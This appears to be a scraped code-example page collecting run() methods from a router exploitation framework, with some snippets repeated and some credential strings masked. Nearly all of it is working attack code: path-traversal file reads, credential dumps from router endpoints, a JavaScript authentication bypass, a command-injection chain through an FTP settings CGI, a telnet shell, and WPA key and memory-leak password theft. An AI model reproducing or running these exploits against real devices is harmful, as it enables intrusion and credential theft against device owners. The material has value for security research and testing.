예제 #1
0
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         url = "{}:{}".format(self.target, self.port)
         print_info("Visit: {}/\n".format(url))
     else:
         print_error("Target seems to be not vulnerable")
    def run(self):
        # address and parameters
        url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response = http_request(method="POST", url=url, data=data)
        if response is None:
            return

        if response.status_code == 200:
            print_success("Exploit success")
            print_status("File: {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed")
예제 #3
0
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            file_path = "..{}".format(self.filename)

            url = "{}:{}/apply.cgi".format(self.target, self.port)
            data = {"html_response_page": file_path,
                    "action": "do_graph_auth",
                    "login_name": "test",
                    "login_pass": "******",
                    "&login_n": "test2",
                    "log_pass": "******",
                    "graph_code": "63778",
                    "session_id": "test5",
                    "test": "test"}

            print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password))
            response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
            if response is None:
                return

            if response.status_code == 200:
                print_status("File: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read response")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
예제 #4
0
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         url = "{}:{}".format(self.target, self.port)
         print_info("Visit: {}/\n".format(url))
     else:
         print_error("Target seems to be not vulnerable")
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            url = "{}:{}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}" \
                  .format(self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
            if response is None:
                print_error("Exploit failed - could not read response")
                return

            print_status("Trying to read file: {}".format(self.filename))
            if any(
                    err in response.text for err in
                ['Error 404 NOT_FOUND', 'Problem accessing', 'HTTP ERROR 404'
                 ]):
                print_status("File does not exist: {}".format(self.filename))
                return

            if response.text:
                print_info(response.text)
            else:
                print_status("File seems to be empty")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
예제 #6
0
 def run(self):
     if self.check():
         print_success("Target appears to be vulnerable")
         print_status("Dumping configuration...")
         print_info(self.configuration)
     else:
         print_error("Exploit failed - target does not appear vulnerable")
예제 #7
0
 def hexdump(self, s):
     for b in xrange(0, len(s), 16):
         lin = [c for c in s[b:b + 16]]
         hxdat = ' '.join('%02X' % ord(c) for c in lin)
         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
         print_info('  %04x: %-48s %s' % (b, hxdat, pdat))
     print
예제 #8
0
    def run(self):
        self.vulnerabilities = []
        self.not_verified = []
        target = utils.safe_json_loads(self.target)
        if target:
            self.target = target

        with threads.ThreadPoolExecutor(self.threads) as executor:
            for directory in self._exploits_directories:
                for exploit in utils.iter_modules(directory):
                    executor.submit(self.target_function, exploit)

        print_info()
        if self.not_verified:
            print_status("Could not verify exploitability:")
            for v in self.not_verified:
                print_info(" - {}".format(v))

        print_info()
        if self.vulnerabilities:
            print_success("Device is vulnerable:")
            for v in self.vulnerabilities:
                print_info(" - {}".format(v))
            print_info()
        else:
            print_error("Could not confirm any vulnerablity\n")
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print_info("\nUse your browser:")
         print_info("{}:{}/xslt".format(self.target, self.port))
     else:
         print_error("Target seems to be not vulnerable")
예제 #10
0
    def run(self):
        vulnerabilities = []

        for exploit in utils.iter_modules(utils.EXPLOITS_DIR):
            exploit = exploit()
            exploit.target = self.target
            exploit.port = self.port

            response = exploit.check()

            if response is True:
                print_success("{} is vulnerable".format(exploit))
                vulnerabilities.append(exploit)
            elif response is False:
                print_error("{} is not vulnerable".format(exploit))
            else:
                print_status("{} could not be verified".format(exploit))

        if vulnerabilities:
            print_info()
            print_success("Device is vulnerable!")
            for v in vulnerabilities:
                print_info(" - {}".format(v))
        else:
            print_error("Device is not vulnerable to any exploits!\n")
    def run(self):
        if self.check():
            url = "{}:{}/password.cgi".format(self.target, self.port)
            print_status("Requesting for {}".format(url))

            response = http_request(method="GET", url=url)
            if response is None:
                return

            regexps = [("admin", "pwdAdmin = '(.+?)'"),
                       ("support", "pwdSupport = '(.+?)'"),
                       ("user", "pwdUser = '******'")]

            creds = []
            for regexp in regexps:
                res = re.findall(regexp[1], response.text)

                if len(res):
                    creds.append((regexp[0], b64decode(res[0])))

            if len(creds):
                print_success("Credentials found!")
                headers = ("Login", "Password")
                print_table(headers, *creds)
                print_info("NOTE: Admin is commonly implemented as root")
            else:
                print_error("Credentials could not be found")
        else:
            print_error("Device seems to be not vulnerable")
예제 #12
0
    def run(self):
        response = self.telnet_login()
        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
            print_status("FTP and HTTP service active")
            creds = self.ftp_get_config()

            if creds:
                print_status("Use javascript console (through developer tools) to bypass authentication:")
                payload = ('var user = "******"\n'
                           'var hash2 = "{}";\n'
                           'var HA2 = MD5("GET" + ":" + uri);\n'
                           'document.getElementById("user").value = user;\n'
                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
                           'document.authform.submit();\n')

                for user in creds:
                    print_success("User: {} Role: {}".format(user[0], user[2]))
                    print_info(payload.format(user[0], user[3]))

        elif '}=>' in response:
            print_success("Successful authentication through Telnet service")
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            tn.read_until(': ')
            tn.write(self.remote_user + '\r\n')
            tn.read_until(': ')
            tn.write(self.remote_pass + '\r\n')
            tn.interact()
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
예제 #13
0
    def run(self):
        if self.check():
            url = "{}:{}/password.cgi".format(self.target, self.port)
            print_status("Requesting for {}".format(url))

            response = http_request(method="GET", url=url)
            if response is None:
                return

            regexps = [("admin", "pwdAdmin = '(.+?)'"),
                       ("support", "pwdSupport = '(.+?)'"),
                       ("user", "pwdUser = '******'")]

            creds = []
            for regexp in regexps:
                res = re.findall(regexp[1], response.text)

                if len(res):
                    creds.append((regexp[0], b64decode(res[0])))

            if len(creds):
                print_success("Credentials found!")
                headers = ("Login", "Password")
                print_table(headers, *creds)
                print_info("NOTE: Admin is commonly implemented as root")
            else:
                print_error("Credentials could not be found")
        else:
            print_error("Device seems to be not vulnerable")
 def command_loop(self):
     while 1:
         cmd = raw_input("cmd > ")
         try:
             print_info(self.execute(cmd))
         except socket.timeout:
             print_error("No response received. The exploit tends to be unstable though. It is worth trying to run the same command again.")
예제 #15
0
    def run(self):
        self.session = requests.Session()

        if self.check():
            print_success("Target seems to be vulnerable")
            print_status("Trying to authenticate")
            if self.login():
                file_path = "../../..{}".format(self.path)
                url = "{}:{}/events/reports/view.cgi?download=1&files={}%00".format(self.target, self.port, file_path)
                print_status("Requesting: {}".format(file_path))
                response = http_request(method="GET", url=url, session=self.session)

                if response is None:
                    print_error("Exploit failed")
                    return

                print_status("Reading response...")

                if not len(response.text) or "empty or is not available to view" in response.text:
                    print_error("Exploit failed. Empty response.")
                else:
                    print_info(response.text)

            else:
                print_error("Exploit failed. Could not authenticate.")
        else:
            print_error("Exploit failed. Target seems to be not vulnerable.")
예제 #16
0
 def run(self):
     if self.check():
         print_success("Target seems to be vulnerable")
         print_status("Dumping configuration...")
         print_info(self.content)
     else:
         print_error("Exploit failed - target seems to be not vulnerable")
예제 #17
0
 def hexdump(self, s):
     for b in xrange(0, len(s), 16):
         lin = [c for c in s[b: b + 16]]
         hxdat = ' '.join('%02X' % ord(c) for c in lin)
         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
         print_info('  %04x: %-48s %s' % (b, hxdat, pdat))
     print
    def run(self):
        url = "{}:{}/UD/?5".format(self.target, self.port)
        headers = {
            'SOAPACTION':
            '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
            'Content-Type': 'text/xml; charset="utf-8"',
            'Expect': '100-continue'
        }
        data = (
            "<?xml version=\"1.0\"?>"
            "<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
            "<s:Body>"
            "<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
            "</m:GetLoginPassword>"
            "</s:Body>"
            "</s:Envelope>")

        response = http_request(method="POST",
                                url=url,
                                headers=headers,
                                data=data)
        if response is None:
            return

        r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
        m = r.search(response.text)

        if m:
            print_success("Password has been found")
            print_info("Password: {}".format(m.group(1)))
        else:
            print_error("Exploit failed - could not find password")
예제 #19
0
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print_info("\nUse your browser:")
         print_info("{}:{}/xslt".format(self.target, self.port))
     else:
         print_error("Target seems to be not vulnerable")
예제 #20
0
    def run(self):
        response = self.telnet_login()
        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
            print_status("FTP and HTTP service active")
            creds = self.ftp_get_config()

            if creds:
                print_status("Use javascript console (through developer tools) to bypass authentication:")
                payload = ('var user = "******"\n'
                           'var hash2 = "{}";\n'
                           'var HA2 = MD5("GET" + ":" + uri);\n'
                           'document.getElementById("user").value = user;\n'
                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
                           'document.authform.submit();\n')

                for user in creds:
                    print_success("User: {} Role: {}".format(user[0], user[2]))
                    print_info(payload.format(user[0], user[3]))

        elif '}=>' in response:
            print_success("Successful authentication through Telnet service")
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            tn.read_until(': ')
            tn.write(self.remote_user + '\r\n')
            tn.read_until(': ')
            tn.write(self.remote_pass + '\r\n')
            tn.interact()
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
예제 #21
0
    def command_loop(self):
        while 1:
            cmd = raw_input("cmd > ")

            if cmd in ['exit', 'quit']:
                return

            print_info(self.execute(cmd))
예제 #22
0
    def execute(self, cmd):
        # Get credentials
        print_status("Extracting credentials")
        credential_url = sanitize_url(
            "{}:{}/system.ini?loginuse&loginpas".format(
                self.target, self.port))
        response = http_request(method="GET", url=credential_url)
        # Find the magic sequence "0000 0a0a 0a0a 01"
        magic_sequence_location = response.content.find(
            b'\x00\x00\x0a\x0a\x0a\x0a\x01')
        # Skip ahead by 144 bytes to the beginning of username
        username_location = magic_sequence_location + 144
        # Read every byte in a loop until the first '\x00'
        # THIS WILL NOT WORK UNDER PYTHON 3 (bytearrays return ints in py3)!
        username_bytes = bytearray()
        next_username_byte = bytes()
        index = username_location
        while next_username_byte != b'\x00':
            username_bytes.append(response.content[index])
            next_username_byte = response.content[index + 1]
            index = index + 1
        username = username_bytes.decode('utf-8')
        print_info("Username: "******"Password: "******"{}:{}/set_ftp.cgi?next_url=ftp.htm&loginuse={}&loginpas={}&svr=192.168.1.1&port=21&user=ftp&pwd=$({})&dir=/&mode=PORT&upload_interval=0".format(
            self.target, self.port, username, password, cmd)
        http_request(method="GET", url=command_url)

        # Run command
        run_url = "{}:{}/ftptest.cgi?next_url=test_ftp.htm&loginuse={}&loginpas={}".format(
            self.target, self.port, username, password)
        http_request(method="GET", url=run_url)

        time.sleep(2)
        return ""
예제 #23
0
 def command_loop(self):
     while 1:
         cmd = raw_input("cmd > ")
         try:
             print_info(self.execute(cmd))
         except socket.timeout:
             print_error(
                 "No response received. The exploit tends to be unstable though. It is worth trying to run the same command again."
             )
    def run(self):
        url = "{}:{}/filename.gwc".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and "User Password" in response.text:
            print_success("Exploit success - reading configuration file filename.gwc")
            print_info(response.text)
        else:
            print_error("Exploit failed - could not read configuration file")
    def run(self):
        url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success - reading file {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed - could not read file")
    def run(self):
        url = "{}:{}/GatewaySettings.bin".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and "0MLog" in response.text:
            print_success("Exploit success")
            print_status("Reading file GatewaySettings.bin")
            print_info(response.text)
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
예제 #27
0
    def run(self):
        url = "{}:{}/GatewaySettings.bin".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and "0MLog" in response.text:
            print_success("Exploit success")
            print_status("Reading file GatewaySettings.bin")
            print_info(response.text)
        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
예제 #28
0
    def command_loop(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(30)
        s.connect((self.target, 32764))

        while(1):
            cmd = raw_input("cmd > ")

            if cmd in ['quit', 'exit']:
                s.close()
                return

            print_info(self.execute(s, 7, cmd.strip("\n")))
    def run(self):
        url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success")
            print_status("Reading file: {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed - could not read file")
    def run(self):
        url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(
            self.target, self.port, self.filename)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success - reading file {}".format(
                self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed - could not read file")
    def run(self):
        url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(
            self.target, self.port, self.filename)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code == 200 and len(response.text):
            print_success("Exploit success")
            print_status("Reading file: {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Exploit failed - could not read file")
    def run(self):
        if self.check():
            url = "{}:{}{}".format(self.target, self.port, self.valid)

            print_status("Sending payload request")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success")
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        if self.check():
            url = "{}:{}{}".format(self.target, self.port, self.valid)

            print_status("Sending payload request")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success")
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            url = "{}:{}/.htpasswd".format(self.target, self.port)
            response = http_request(method="GET", url=url)
            if response is None:
                print_error("Exploit failed - connection error")
                return

            print_info("Unix crypt hash: $id$salt$hashed")  # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
            print_success("Hash found:", response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        if self.check():
            url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(
                self.target, self.port))
            response = requests.get(url)
            print_info("Exploit succeeded, extracting credentials...")

            # May the lord forgive me for writing such spaghetti
            # Find the magic sequence "0000 0a0a 0a0a 01"
            magic_sequence_location = response.content.find(
                b'\x00\x00\x0a\x0a\x0a\x0a\x01')
            # Skip ahead by 144 bytes to the beginning of username
            username_location = magic_sequence_location + 144
            # Read every byte in a loop until the first '\x00'
            # THIS WILL NOT WORK UNDER PYTHON 3!
            username_bytes = bytearray()
            next_username_byte = bytes()
            index = username_location
            while next_username_byte != b'\x00':
                username_bytes.append(response.content[index])
                next_username_byte = response.content[index + 1]
                index = index + 1
            username = username_bytes.decode('utf-8')
            print_success("Username: "******"Password: "******"Exploit failed. Device seems to be not vulnerable.")
    def run(self):
        if self.check():
            url = "{}:{}/cgi-bin/webproc?getpage={}&var:language=es_es&var:page=".format(self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Success! File: %s" % self.filename)
                print_info(response.text)
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")
    def run(self):
        for resource in self.resources:
            url = "{}:{}{}".format(self.target, self.port, resource)

            print_status("Sending request to download sensitive information")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and "password" in response.text:
                print_succcess("Exploit success")
                print_status("Reading {} file".format(resource))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not retrieve response")
    def run(self):
        if self.check():
            url = "{}:{}/../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and response.text:
                print_success("Success! File: %s" % self.filename)
                print_info(response.text)
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(self.target, self.port, self.filename)

            print_status("Sending paylaod request")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success - reading {} file".format(self.filename))
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        for resource in self.resources:
            url = "{}:{}{}".format(self.target, self.port, resource)

            print_status("Sending request to download sensitive information")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and "password" in response.text:
                print_success("Exploit success")
                print_status("Reading {} file".format(resource))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not retrieve response")
예제 #41
0
    def run(self):
        if self.check():
            url = "{}:{}/../../../../../../../../../../../..{}".format(
                self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and response.text:
                print_success("Success! File: %s" % self.filename)
                print_info(response.text)
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port,
                                                 self.access_level,
                                                 self.show_command)
         response = http_request(method="GET", url=url)
         if response is None:
             print_error(
                 "Could not execute command")  # target is not vulnerable
             return
         else:
             print_success("Exploit success! - executing command")
             print_info(re.sub('<[^<]+?>', '', response.text))
     else:
         print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        print_status("Sending exploit payload")
        sock.sendto(self.payload, (self.target, 43690))

        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return

        if len(response):
            print_success("Exploit success")
            print_info(response)
예제 #44
0
    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        print_status("Sending exploit payload")
        sock.sendto(self.payload, (self.target, 43690))

        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
        except:
            print_error("Exploit failed - device seems to be not vulnerable")
            return

        if len(response):
            print_success("Exploit success")
            print_info(response)
예제 #45
0
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(
                self.target, self.port, self.filename)

            print_status("Sending paylaod request")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success - reading {} file".format(
                    self.filename))
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            url = "{}:{}{}".format(self.target, self.port, self.valid)

            print_status("Sending request to download sensitive information")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_status("Reading {}".format(self.valid))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not retrieve response")

        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        print_status("Sending payload")
        sock.sendto(self.payload, (self.target, 69))

        try:
            response = sock.recv(2048)
        except:
            print_error("Exploit failed - device seems to be not vulnerable")
            return

        if len(response):
            if "UseUserCredential" in response:
                print_success("Exploit success - file {}".format("SPDefault.cnf.xml"))
                print_info(response)
            else:
                print_error("Exploit failed - credentials not found in response")
        else:
            print_error("Exploit failed - empty response")
    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port)
            url2 = "{}:{}/get_status.cgi".format(self.target, self.port)
            url3 = "{}:{}//proc/kcore".format(self.target, self.port)

            response = http_request(method="GET", url=url1)
            if response is not None and "WPAPSK" in response.text:
                print_success("WPA Password is in this text:")
                print_info(response.text)
            else:
                print_error("Could not find WPA password")

            print_info("Trying to gather more info")
            response = http_request(method="GET", url=url2)
            if response is not None and "ddns_host" in response.text:
                print_success("ddns host name:")
                print_info(response.text)
            else:
                print_error("could not read ddns host name")

            print_status("Trying to find username and password from running memory leak")
            print_status("This could take some time")
            print_status("password is usually stuck next to 'admin' e.g admin123456")
            response = http_request(method="GET", url=url3, stream=True)
            try:
                for chunk in response.iter_content(chunk_size=100):
                    if "admin" in chunk:
                        print_success(chunk)
            except Exception:
                print_error("Exploit failed - could not read /proc/kcore")
    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            print_status("Sending read {} file request".format(self.filename))
            url = "{}:{}/goform/enhAuthHandler".format(self.target, self.port)

            headers = {u"Content-Type": u"application/x-www-form-urlencoded"}

            data = {"__ENH_SHOW_REDIRECT_PATH__": "/pages/C_4_0.asp/../../..{}".format(self.filename),
                    "__ENH_SUBMIT_VALUE_SHOW__": "Acceder",
                    "__ENH_ERROR_REDIRECT_PATH__": "",
                    "username": "******"}

            response = http_request(method="POST", url=url, headers=headers, data=data)
            if response is None:
                return

            print_status("Reading file {}".format(self.filename))
            print_info(response.text)
        else:
            print_error("Target seems to be not vulnerable")
    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            url = "{}:{}/help/../../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename)

            print_status("Sending payload request")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                pos = response.text.find("//--></SCRIPT>") + 15
                res = response.text[pos:]

                if len(res):
                    print_status("Reading file {}".format(self.filename))
                    print_info(res)
                else:
                    print_error("Could not read file {}".format(self.filename))

        else:
            print_error("Exploit failed - target seems to be not vulnerable")
 def run(self):
     if self.check():
         print_success("Target seems to be vulnerable")
         print_info(self.content)
         print_info("please login at:")
         print_info("{}:{}/cgi-bin/chklogin.cgi".format(self.target, self.port))
     else:
         print_error("Exploit failed - target seems to be not vulnerable")
예제 #52
0
    def run(self):
        rootpath = 'routersploit/modules/'
        path = 'exploits'

        modules = []
        for device in listdir(rootpath+path):  # TODO refactor this, using load_modules() from core
            if not device.endswith(".py") and not device.endswith(".pyc"):
                for f in listdir(rootpath+path + "/" + device):
                    if f.endswith(".py") and f != "__init__.py":
                        modules.append(device + "/" + f[:-3])

        vulnerabilities = []
        for module_name in modules:
            f = "".join((path, "/", module_name))

            module = imp.load_source('module', rootpath + f + '.py')
            exploit = module.Exploit()

            exploit.target = self.target
            exploit.port = self.port

            response = exploit.check()

            if response is True:
                print_success("{} is vulnerable".format(f))
                vulnerabilities.append(f)
            elif response is False:
                print_error("{} is not vulnerable".format(f))
            else:
                print_status("{} could not be verified".format(f))

        if vulnerabilities:
            print
            print_success("Device is vulnerable!")
            for v in vulnerabilities:
                print_info(" - {}".format(v))
        else:
            print_error("Device is not vulnerable to any exploits!\n")